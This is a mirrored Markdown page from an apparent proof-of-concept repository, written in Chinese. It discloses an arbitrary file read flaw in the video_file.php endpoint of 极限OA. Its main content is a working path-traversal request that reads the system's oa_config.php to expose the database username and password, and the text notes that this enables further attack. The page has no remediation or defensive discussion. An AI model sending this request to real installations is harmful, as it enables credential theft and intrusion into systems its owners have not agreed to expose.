mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-12 02:57:09 +00:00
11 lines
435 B
Markdown
11 lines
435 B
Markdown
![]() |
## 极限OA接口video_file.php存在任意文件读取漏洞
|
||
|
|
||
|
极限OA video_file.php 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
|
||
|
|
||
|
## poc
|
||
|
|
||
|
```
|
||
|
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
|
||
|
```
|
||
|
|
||
|

|